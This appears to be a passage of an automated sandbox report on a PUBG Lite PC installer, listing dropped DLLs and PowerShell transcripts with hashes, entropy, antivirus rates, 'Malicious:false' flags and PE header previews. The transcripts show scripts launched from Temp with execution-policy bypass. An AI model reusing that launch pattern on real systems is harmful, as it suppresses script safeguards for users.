                                                                                              SHA-512:41C745205C5880CD21144D47EBB12AF2BF1AB5A4F6506FDECA487E0D67AA7D29D1B909DDF03975D2A2AF4447AB471249E7F17F85C2141FD8C6E6016D78FA3B83
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.mA................J...............................................x...........................Rich....................PE..L...mI.n...........!.....PA..........!3......`A....c......................... E.....f.E...@A.........................Y@.K&..8.A.......A.H.....................C..+..@...T....................O......0.................A.4....3@......................text....o@......p@................. ..`.wpp_sf.?.....@......t@............. ..`.data....5...`A......TA.............@....idata...1....A..2...ZA.............@..@.didat..0.....A.......A.............@....rsrc...H.....A.......A.............@..@.reloc...+....C..,....C.............@..B................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\shi5E5.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):83152
                                                                                              Entropy (8bit):6.655252855631263
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:0QIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41MQPlB:0QRoFZwmr+bDk/MOcv0G4sMQT
                                                                                              MD5:BFEB97D760FD0122C054D452E878DDF9
                                                                                              SHA1:787598639AB28B7921A200DFF55A0C8C8FF7A6FC
                                                                                              SHA-256:E154B75132DAE4F3E6948FAC7FC52258B75B6D58B57165525F3E038DCD7268F5
                                                                                              SHA-512:52105896F1DD694F87E48530175D79B98415DAEF18D356D3D55FAB80116B3673ED06E5CB0FFC1F7568BD0747C4FFA673DE12A182497BE1F7421B292C6984DE6B
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................E.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\shiE676.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):5029376
                                                                                              Entropy (8bit):6.043966698117163
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:g8K9SHC3eUPxT0YiBphmS3ECuqOcXQ5WJ0yk5/oeppK5+X5TqVAMPLfByim8bs7q:gw+TKhmPCAoxjVAbiT
                                                                                              MD5:4E355F8ABA069B8EC0316F0D914C1B25
                                                                                              SHA1:22993A98AB9F427013787C742BB332AB459FEAD4
                                                                                              SHA-256:309D867526B22682C7FCC74FCA264A4314C2382508DB0B297FBB00390687739B
                                                                                              SHA-512:0A1CD8C43A6C356ED93CFC5A5B95C110DECBA2756C231627A573158F41011379545650AB1364ECFE0022C7A13E8D7A84A52AF5A7F624B496756799BFF8C3AA19
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OM...#...#...#..V....#..E ...#..E"...#..E&...#...".W,#..E'...#..E#...#..E.../#..E...#..E!...#.Rich..#.........PE..d...hu............" .........@...............................................0M.....`.M...`A........................................P.H.L&....H.......K.H....pI...............M.....P.:.p................... ...(...0...............`.......L.H......................text....%.......&.................. ..`.wpp_sf......@.......*.............. ..`.rdata...M*......N*.................@..@.data....C... I.......I.............@....pdata.......pI.......I.............@..@.didat........K.......J.............@....rsrc...H.....K.......J.............@..@.reloc........M.. ....L.............@..B................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\shiE992.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):4504064
                                                                                              Entropy (8bit):6.101321610477592
                                                                                              Encrypted:false
                                                                                              SSDEEP:98304:/iVAwiMj328++M3VvGP6hMmXem6OXdJWS1:MAwi8m7j3VvGPUMmXem6OXdJWS
                                                                                              MD5:6DC5190BE6C69820DED055AB516CB896
                                                                                              SHA1:CB1DE7F906B9AFF5FB8EE3CED99771CB79F4DA38
                                                                                              SHA-256:7FCCBE248C14040873504EF65B8DA183DF37EAC021DE2869BA4E95A198B70585
                                                                                              SHA-512:41C745205C5880CD21144D47EBB12AF2BF1AB5A4F6506FDECA487E0D67AA7D29D1B909DDF03975D2A2AF4447AB471249E7F17F85C2141FD8C6E6016D78FA3B83
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.mA................J...............................................x...........................Rich....................PE..L...mI.n...........!.....PA..........!3......`A....c......................... E.....f.E...@A.........................Y@.K&..8.A.......A.H.....................C..+..@...T....................O......0.................A.4....3@......................text....o@......p@................. ..`.wpp_sf.?.....@......t@............. ..`.data....5...`A......TA.............@....idata...1....A..2...ZA.............@..@.didat..0.....A.......A.............@....rsrc...H.....A.......A.............@..@.reloc...+....C..,....C.............@..B................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\shiEAFA.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):83152
                                                                                              Entropy (8bit):6.655252855631263
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:0QIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41MQPlB:0QRoFZwmr+bDk/MOcv0G4sMQT
                                                                                              MD5:BFEB97D760FD0122C054D452E878DDF9
                                                                                              SHA1:787598639AB28B7921A200DFF55A0C8C8FF7A6FC
                                                                                              SHA-256:E154B75132DAE4F3E6948FAC7FC52258B75B6D58B57165525F3E038DCD7268F5
                                                                                              SHA-512:52105896F1DD694F87E48530175D79B98415DAEF18D356D3D55FAB80116B3673ED06E5CB0FFC1F7568BD0747C4FFA673DE12A182497BE1F7421B292C6984DE6B
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................E.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\Documents\20220810\PowerShell_transcript.405464.6q+qouXm.20220810064640.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1580
                                                                                              Entropy (8bit):5.267742760686203
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:BZzOvMMeoOLdeuKjMEUwzUzYB1ZDO4O4OLkZZr:BZ+M3NGj6SUzo1ZDDD9Zp
                                                                                              MD5:4B8DD816203347E8D7B1EAE145F87594
                                                                                              SHA1:884366545CFFA4F71866551BBC832B640AA3076B
                                                                                              SHA-256:F0032F4A2C9F2986AB9297FBE2D0982F562773DC42D6FB2B4249A2DC9EE1D305
                                                                                              SHA-512:FE465B4D1D23D7CE5C192AC196CED0B1D1AB26E2FC6D805B2F1786F27070B70FA719786588F053EB7E765FB74588D1919ACD0EE08715207472B78A19A10DC263
                                                                                              Malicious:false
                                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220810064640..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.19042.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pssE5D4.ps1 -propFile C:\Users\user\AppData\Local\Temp\msiE5A2.txt -scriptFile C:\Users\user\AppData\Local\Temp\scrE5A3.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scrE5A4.txt -propSep :<->: -testPrefix _testValue...Process ID: 7608..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220810064807..**********************..PS>TerminatingError(Invoke-WebRequest): "The reque

                                                                                              C:\Users\user\Documents\20220810\PowerShell_transcript.405464.PX1SnoFs.20220810064703.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1580
                                                                                              Entropy (8bit):5.273608818614978
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:BZFLOvMMeoOLdWSIrjMPUw/UzYB1ZnO4O4OLkZZr:BZFmM3N3kj96Uzo1ZnDD9Zp
                                                                                              MD5:1031354DBF65C8236E6E3CA8AC8666BC
                                                                                              SHA1:F2BC96CC4CB172F5180BB5C24CB644A5C960914D
                                                                                              SHA-256:0727CD8B324AD33C887C37B757F4CECA6E2AD236D44C21F5C0754CA2DFC8A033
                                                                                              SHA-512:D970844FB39312BCB8CAB270F8F7A86D0F6C8225F80FEEA4E4225FE53E9A798EE98F7608C436A708A28FBD4274BF633E3A978D4316AF3BA2C58707B06327145F
                                                                                              Malicious:false
                                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220810064703..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.19042.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pss3EE5.ps1 -propFile C:\Users\user\AppData\Local\Temp\msi3EB4.txt -scriptFile C:\Users\user\AppData\Local\Temp\scr3EB5.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scr3EB6.txt -propSep :<->: -testPrefix _testValue...Process ID: 5736..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220810064814..**********************..PS>TerminatingError(Invoke-WebRequest): "The reque

                                                                                              C:\Users\user\Documents\20220810\PowerShell_transcript.405464.ZXE3PjsB.20220810064549.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4613
                                                                                              Entropy (8bit):5.288236024376144
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:BZ0M3NLjVWUzo1ZhZmM3NLjVWUzo1ZLnA7NmA7uygMaA7uygMaA7OyKMPKoKu54v:pe/xFayxBayxBSyb0
                                                                                              MD5:B5D4927098DE52EC418299182888AACC
                                                                                              SHA1:6E9AB2640C4B6B6DB91CBB6ABC6F54601BA16E41
                                                                                              SHA-256:026F644387604FECB1A95CA71577449989EBBDF497EC1064A6CC21395C130797
                                                                                              SHA-512:52A8BA7978DA6C22BB16521D425A1E0010EDF92FE6A5B1913589A1A4CE90F5379516AA364834093D5940A5B95A106516EFCD553792F295AB7EF8AB46321DC38F
                                                                                              Malicious:false
                                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220810064549..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.19042.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pss1D88.ps1 -propFile C:\Users\user\AppData\Local\Temp\msi1D27.txt -scriptFile C:\Users\user\AppData\Local\Temp\scr1D28.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scr1D29.txt -propSep :<->: -testPrefix _testValue...Process ID: 2140..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20220810064921..Username: computer\user..RunAs User: W1064_

                                                                                              C:\Users\user\Documents\20220810\PowerShell_transcript.405464.s4fhVLlE.20220810064611.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1079
                                                                                              Entropy (8bit):5.244816618979079
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:BxSAewOvMMex2DOzvdxIuljMEX3Uu6WKljexKKzX4CIym1ZJXqnxSAZK:BZROvMMeoOLdxzljMIUwKUzYB1ZOZZK
                                                                                              MD5:B37B3E6BC1A35BB8F8158BA83E38DA9C
                                                                                              SHA1:5DBE702405F1CACCC9AD9580AE2113970E1A102E
                                                                                              SHA-256:9F439DCA96929767926179BF11CCF219F3AFEF0A87B129F5E6E4044B2A61F988
                                                                                              SHA-512:8AF3AAD322ECA4263FB9C3F485A2E3D3DB3590480D291944C2AE26BB1855BC785661E8C53B91661A6D00427F013B502D2D1D7689A0B731285605F03F1C965A4E
                                                                                              Malicious:false
                                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220810064611..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.19042.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pss7419.ps1 -propFile C:\Users\user\AppData\Local\Temp\msi73B8.txt -scriptFile C:\Users\user\AppData\Local\Temp\scr73B9.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scr73BA.txt -propSep :<->: -testPrefix _testValue...Process ID: 2620..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220810064910..**********************..PS>$global:?..True..**********************..Window

                                                                                              C:\Users\user\Documents\20220810\PowerShell_transcript.405464.vduECdO8.20220810064728.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1580
                                                                                              Entropy (8bit):5.262586158063893
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:BZlOvMMeoOLdbq2jM8UwzUzYB1ZEO4O4OLDZZ+:BZQM3NRjqyUzo1ZEDDWZQ
                                                                                              MD5:0D13E994A0910791D44AFA1DA2F9C2E0
                                                                                              SHA1:97EF975176FDE9F82EDE893EB367DEA446835791
                                                                                              SHA-256:DAA80025C84311A57D3815209E0A06CA8757DFEB3D1590F477927247929F1999
                                                                                              SHA-512:9A100A7917A78A9D48C018AA1B9483D471CC78D255F2C9632A0B3478C4B00B682B2E9B95805ACB9B368737976CC3026DDDA378D3509BF6513A5E06079376F03F
                                                                                              Malicious:false
                                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220810064729..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.19042.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pssA352.ps1 -propFile C:\Users\user\AppData\Local\Temp\msiA310.txt -scriptFile C:\Users\user\AppData\Local\Temp\scrA311.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scrA312.txt -propSep :<->: -testPrefix _testValue...Process ID: 2368..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220810064833..**********************..PS>TerminatingError(Invoke-WebRequest): "The reque

                                                                                              C:\Windows\Installer\MSI101A.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):780768
                                                                                              Entropy (8bit):6.387720196228063
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                                              MD5:573F5E653258BF622AE1C0AD118880A2
                                                                                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI1115.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):780768
                                                                                              Entropy (8bit):6.387720196228063
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                                              MD5:573F5E653258BF622AE1C0AD118880A2
                                                                                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI19B2.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388064
                                                                                              Entropy (8bit):6.407392408414975
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                                              MD5:20C782EB64C81AC14C83A853546A8924
                                                                                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI1A3F.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):581088
                                                                                              Entropy (8bit):6.420102566650646
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:yYnBQYFydLAOnSoAAtBLl2m1bEM7OAU9ZimyPR10h5kPFilVBQU6oiLu:yYnK8abpT1bjOhG04mVqU6oiLu
                                                                                              MD5:4C4CFBE97422D3FF76B3CD00A3295B41
                                                                                              SHA1:B2C7A4C2476EEE35C6FE508447E5D2025602B5DB
                                                                                              SHA-256:63F2DCEA91CB937CBD2DBDDB127F094791A6E07E8C182AF8D9F459042FC62B53
                                                                                              SHA-512:BFC332A46972A9A7353B1788AADE66B316BCCF226DF3A1496C3A1468168BF9045BD6112759096FB5645CB323B641A4A2C6C32A980A3EDAB26F41E288A4F08C65
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.....................D...;......;...............;...........................9......9......9...........9......Rich...........PE..L...E.`.........."!.....<..........3/.......P............................................@..........................Q.......R..........h........................X..X...p...........................hc..@............P.......N..@....................text....;.......<.................. ..`.rdata.......P.......@..............@..@.data........p.......V..............@....rsrc...h............d..............@..@.reloc...X.......Z...j..............@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI1ADC.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):780768
                                                                                              Entropy (8bit):6.387720196228063
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                                              MD5:573F5E653258BF622AE1C0AD118880A2
                                                                                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI1CA4.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):554976
                                                                                              Entropy (8bit):6.564031509584106
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:muE7WkO++qXMFMHVwdw2G0NvLCXny2nnQiJr3c+/8d0jMfIPUQMPT6INiIsvMrhG:sWDMNYIy2nZJr3c+/8d0QfI2WI8IGMrU
                                                                                              MD5:2A7B214E782C8807B9B87B66B9897679
                                                                                              SHA1:400FD663C0579566B27FCCA0107DE5DD54C1372D
                                                                                              SHA-256:CE5D590FCC4270BB347EFEAA58A283C6551821248D33E20ECDC4156AC27710A4
                                                                                              SHA-512:95DB659FC2A462780200C109C859D84156585D07DF87D6B85491149E62F1CE329D30D63D99931A6AF1810CC7CED3624E1864F2DBD1075A8DA0DC42136BDCC186
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@..A...@..AW..@..A...@&..A...@&..A...@..@...@&..A...@..A...@...@...@$..A...@$..A...@$..@...@..x@...@$..A...@Rich...@........PE..L...@.`.........."!.....4...:......l........P......................................r.....@.................................h...x....@...............^.......P...O...X..p....................Z.......Y..@............P...............................text...X3.......4.................. ..`.rdata..|....P.......8..............@..@.data...............................@....rsrc........@......................@..@.reloc...O...P...P..................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI299.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388064
                                                                                              Entropy (8bit):6.407392408414975
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                                              MD5:20C782EB64C81AC14C83A853546A8924
                                                                                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\Installer\MSI2F8.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388064
                                                                                              Entropy (8bit):6.407392408414975
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                                              MD5:20C782EB64C81AC14C83A853546A8924
                                                                                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
